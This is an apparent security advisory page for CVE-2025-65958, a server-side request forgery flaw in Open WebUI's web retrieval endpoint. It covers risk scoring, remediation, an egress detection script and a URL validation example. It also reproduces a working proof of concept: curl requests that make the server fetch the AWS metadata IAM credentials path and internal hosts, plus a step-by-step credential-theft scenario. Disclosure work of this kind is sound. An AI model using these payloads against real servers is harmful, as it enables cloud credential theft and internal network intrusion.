CVE-2025-65958: open-webui: SSRF allows internal network access

GHSA-c6xv-rcvw-v685 | HIGH | PoC AVAILABLE | CISA: TRACK*
Published December 4, 2025
CISO Take

Any authenticated Open WebUI user can force your server to fetch cloud metadata endpoints (AWS/GCP/Azure IAM credentials), internal databases, and private network services—no admin rights required. If running Open WebUI in a cloud environment, treat IAM credentials as potentially compromised. Patch to 0.6.37 immediately; if blocked, deny egress to 169.254.169.254 and RFC1918 ranges from the Open WebUI container and disable the /api/v1/retrieval/process/web endpoint at your WAF.

Risk Assessment

High risk for cloud-hosted deployments. A CVSS score of 8.5, a network-accessible attack vector and a low privilege bar make this exploitable by any disgruntled employee or through any compromised account. The critical amplifier is access to the cloud metadata endpoint: a single request that carries no cloud credentials of its own can yield IAM credentials enabling full cloud account takeover. EPSS is currently low (0.0004), but the PoC is fully public and Open WebUI is widely deployed in enterprise AI environments. Exploitation probability will rise rapidly as threat actors scan for this pattern.

Affected Systems

Package: open-webui
Ecosystem: pip
Vulnerable Range: <= 0.6.36
Patched: 0.6.37

Severity & Risk

CVSS 3.1: 8.5 / 10
EPSS: 0.1% chance of exploitation in 30 days (higher than 22% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

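Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): None
Scope (S): Changed
Confidentiality (C): High
Integrity (I): Low
Availability (A): None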

Recommended Action

  1. PATCH: Upgrade open-webui to 0.6.37 immediately (commit: 02238d3113e966c353fce18f1b65117380896774).

  2. WORKAROUND (if unable to patch): Block /api/v1/retrieval/process/web at WAF or reverse proxy.

  3. NETWORK EGRESS: Deny outbound requests from the Open WebUI container to 169.254.169.254, 169.254.0.0/16, fd00:ec2::254, and RFC1918 ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) via iptables/security groups.

  4. CLOUD FORENSICS: Audit CloudTrail/GCP audit logs for metadata service requests originating from Open WebUI instances; rotate IAM credentials as a precaution if exposure window existed.

  5. DETECTION: Alert on HTTP requests from the Open WebUI host to 169.254.x.x or private IP ranges in SIEM and WAF logs.

  6. ACCESS REVIEW: Audit all Open WebUI user accounts—blast radius is all authenticated users, including service accounts.
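
The detection in step 5, sketched as an added example (not code from Open WebUI or from this advisory): it scans egress flow records for connections from the Open WebUI host to the ranges named in step 3. The log format, the host addresses, the `allowed` exception list and all function names are assumptions made for illustration; the sample records are constructed.

```python
import ipaddress

# Destination ranges from step 3 (169.254.0.0/16 already covers 169.254.169.254).
WATCHED = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16", "fd00:ec2::254/128",
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
)]

# Constructed sample records: "<timestamp> <src_ip> <dst_ip> <dst_port>"
SAMPLE_LOG = """\
2025-12-04T10:00:01Z 10.20.0.15 93.184.216.34 443
2025-12-04T10:00:03Z 10.20.0.15 10.20.0.30 5432
2025-12-04T10:00:07Z 10.20.0.15 169.254.169.254 80
2025-12-04T10:00:09Z 10.20.0.15 192.168.1.1 80
2025-12-04T10:00:12Z 10.20.0.99 10.0.0.5 5432
2025-12-04T10:00:15Z 10.20.0.15 fd00:ec2::254 80
2025-12-04T10:00:20Z 10.20.0.15 not-an-ip 80
"""

def flag_egress(log_text, webui_hosts, allowed=frozenset()):
    """Return (timestamp, dst, port, matched_range) for each flow from an
    Open WebUI host to a watched range, minus known-good (dst, port) pairs."""
    sources = {ipaddress.ip_address(h) for h in webui_hosts}
    alerts = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, dst, port = parts
        try:
            src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
            port_no = int(port)
        except ValueError:
            continue  # malformed record; a real pipeline should count these
        if src_ip not in sources or (str(dst_ip), port_no) in allowed:
            continue
        net = next((n for n in WATCHED if dst_ip in n), None)
        if net is not None:
            alerts.append((ts, str(dst_ip), port_no, str(net)))
    return alerts
```

The `allowed` set matters in practice: an Open WebUI container usually has legitimate private-range peers (its database, a model backend), and leaving them out turns the alert into noise.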

CISA SSVC Assessment

Decision: Track*
Exploitation: poc
Automatable: No
Technical Impact: partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Art.15 - Accuracy, robustness and cybersecurity; Article 15 - Accuracy, Robustness and Cybersecurity; Article 9 - Risk Management System
ISO 42001: A.6.1.2 - Information Security Risk Treatment; A.8.4 - AI System Security; A.9.5 - AI system security
NIST AI RMF: GOVERN-1.7 - Processes for Identifying and Managing Risks; MANAGE-2.2 - Mechanisms to prevent or mitigate AI risks
OWASP LLM Top 10: LLM02:2025 - Sensitive Information Disclosure; LLM06 - Sensitive Information Disclosure; LLM06:2025 - Excessive Agency; LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2025-65958?

Any authenticated Open WebUI user can force your server to fetch cloud metadata endpoints (AWS/GCP/Azure IAM credentials), internal databases, and private network services—no admin rights required. If running Open WebUI in a cloud environment, treat IAM credentials as potentially compromised. Patch to 0.6.37 immediately; if blocked, deny egress to 169.254.169.254 and RFC1918 ranges from the Open WebUI container and disable the /api/v1/retrieval/process/web endpoint at your WAF.

Is CVE-2025-65958 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-65958, increasing the risk of exploitation.

How to fix CVE-2025-65958?

1. PATCH: Upgrade open-webui to 0.6.37 immediately (commit: 02238d3113e966c353fce18f1b65117380896774).
2. WORKAROUND (if unable to patch): Block /api/v1/retrieval/process/web at WAF or reverse proxy.
3. NETWORK EGRESS: Deny outbound requests from the Open WebUI container to 169.254.169.254, 169.254.0.0/16, fd00:ec2::254, and RFC1918 ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) via iptables/security groups.
4. CLOUD FORENSICS: Audit CloudTrail/GCP audit logs for metadata service requests originating from Open WebUI instances; rotate IAM credentials as a precaution if exposure window existed.
5. DETECTION: Alert on HTTP requests from the Open WebUI host to 169.254.x.x or private IP ranges in SIEM and WAF logs.
6. ACCESS REVIEW: Audit all Open WebUI user accounts—blast radius is all authenticated users, including service accounts.

What systems are affected by CVE-2025-65958?

This vulnerability affects the following AI/ML architecture patterns: AI chat interfaces, RAG pipelines, Cloud-hosted LLM deployments, LLM serving infrastructure, Enterprise AI platforms.

What is the CVSS score for CVE-2025-65958?

CVE-2025-65958 has a CVSS v3.1 base score of 8.5 (HIGH). The EPSS exploitation probability is 0.07%.

Technical Details

NVD Description

### Summary

A Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required.

### Details

The vulnerability exists in the /api/v1/retrieval/process/web endpoint located in backend/open_webui/routers/retrieval.py at lines 1758-1767.

Vulnerable code:

```python
@router.post("/process/web")
def process_web(
    request: Request, form_data: ProcessUrlForm, user=Depends(get_verified_user)
):
    try:
        collection_name = form_data.collection_name
        if not collection_name:
            collection_name = calculate_sha256_string(form_data.url)[:63]

        content, docs = get_content_from_url(request, form_data.url)  # ← SSRF vulnerability
```

The form_data.url parameter is passed directly to get_content_from_url() without any validation. This function chain ultimately calls web loaders that fetch arbitrary URLs.

Call chain:

1. retrieval.py:1767 → get_content_from_url(request, form_data.url)
2. retrieval/utils.py:77 → get_loader(request, url)
3. retrieval/utils.py:62 → get_web_loader(url, ...) or YoutubeLoader(url, ...)
4. Both loaders fetch the user-supplied URL without validation

No validation is performed for:

- Private IP ranges (RFC1918: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)
- Localhost addresses (127.0.0.0/8)
- Cloud metadata endpoints (169.254.169.254, fd00:ec2::254)
- Protocol restrictions (file://, gopher://, etc.)
- Domain allowlisting

### PoC

Prerequisites: Valid user account (any role)

Step 1 - Authenticate:

```bash
TOKEN=$(curl -s "http://localhost:3000/api/v1/auths/signin" \
  -H 'Content-Type: application/json' \
  -d '{"email":"user@example.com","password":"password"}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")
```

Step 2 - Basic SSRF Test (external URL):

```bash
curl -s "http://localhost:3000/api/v1/retrieval/process/web" \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{"url":"http://example.com"}'
```

Result: Server fetches example.com and returns its content, proving the vulnerability.

```json
{
  "status": true,
  "file": {
    "data": {
      "content": "Example Domain This domain is for use in documentation..."
    }
  }
}
```

Step 3 - Advanced Attack (AWS metadata):

```bash
curl -s "http://localhost:3000/api/v1/retrieval/process/web" \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -d '{"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'
```

Result: Server exposes cloud credentials if running on AWS/GCP/Azure.

Other attack examples:

- Internal network: {"url":"http://192.168.1.1"}
- Localhost services: {"url":"http://localhost:5432"}
- Internal APIs: {"url":"http://internal-api.local"}

### Impact

Who is affected: All authenticated users (no special permissions required)

Attack capabilities:

1. Cloud Environment Compromise
   - Steal AWS/GCP/Azure credentials via metadata endpoints
   - Result: Full cloud account takeover
2. Internal Network Access
   - Bypass firewalls to access internal services (databases, admin panels, APIs)
   - Port scan and map internal infrastructure
   - Result: Complete network visibility
3. Data Exfiltration
   - Read internal documentation, configurations, secrets
   - Access Kubernetes API servers
   - Result: Credential theft, API key exposure
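
The checks the description lists as missing, written out as an added example; this is not Open WebUI's code and not the 0.6.37 patch. `check_url`, `is_internal`, `system_resolve`, `fake_resolve` and `FAKE_DNS` are hypothetical names, and the DNS answers are constructed so the block runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # rejects file://, gopher://, etc.

def is_internal(ip):
    """True for loopback, RFC1918/ULA, link-local (metadata) and similar ranges."""
    if ip.version == 6 and ip.ipv4_mapped:   # ::ffff:a.b.c.d wraps an IPv4 target
        ip = ip.ipv4_mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)

def system_resolve(host):
    # Every address the OS resolver returns for host.
    return [ai[4][0] for ai in socket.getaddrinfo(host, None, type=socket.SOCK_STREAM)]

def check_url(url, resolve=system_resolve, allowed_hosts=None):
    """Return (ok, reason) for a user-supplied URL, before any fetch happens."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not host:
        return False, "missing host"
    if allowed_hosts is not None and host not in allowed_hosts:
        return False, "host not in allowlist"
    try:
        # Judge what the name resolves to, not the string the user typed.
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    except (OSError, ValueError):
        addrs = []
    if not addrs:
        return False, "resolution failed"
    if any(is_internal(a) for a in addrs):   # one internal answer is enough to refuse
        return False, "resolves to internal address"
    return True, "ok"

FAKE_DNS = {   # constructed answers so the example runs offline
    "example.com": ["93.184.216.34"], "internal-api.local": ["10.1.2.3"],
    "169.254.169.254": ["169.254.169.254"], "mapped.example": ["::ffff:169.254.169.254"],
    "mixed.example": ["93.184.216.34", "127.0.0.1"],
}

def fake_resolve(host):
    return FAKE_DNS.get(host, [])   # unknown name -> no answers
```

A check like this only holds if the fetcher then connects to the address that was validated and repeats the check on every redirect; validating once and letting the HTTP client resolve the name again leaves a gap between check and use.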

Exploitation Scenario

An insider threat or attacker with a compromised standard user account authenticates to the corporate Open WebUI deployment. They POST to /api/v1/retrieval/process/web with payload {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}, targeting the AWS instance metadata service. The Open WebUI server fetches the URL server-side and returns the IAM role name in the response. A follow-up request to the role-specific endpoint returns AccessKeyId, SecretAccessKey, and Token in plaintext. The attacker exports these credentials to their own system and uses AWS CLI to enumerate S3 buckets, access RDS snapshots, or assume higher-privileged roles—achieving full cloud account takeover. Total time from login to cloud credential exfiltration: under 5 minutes. Minimal application-layer forensic trace.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Timeline

Published: December 4, 2025
Last Modified: December 4, 2025
First Seen: March 24, 2026

Related Vulnerabilities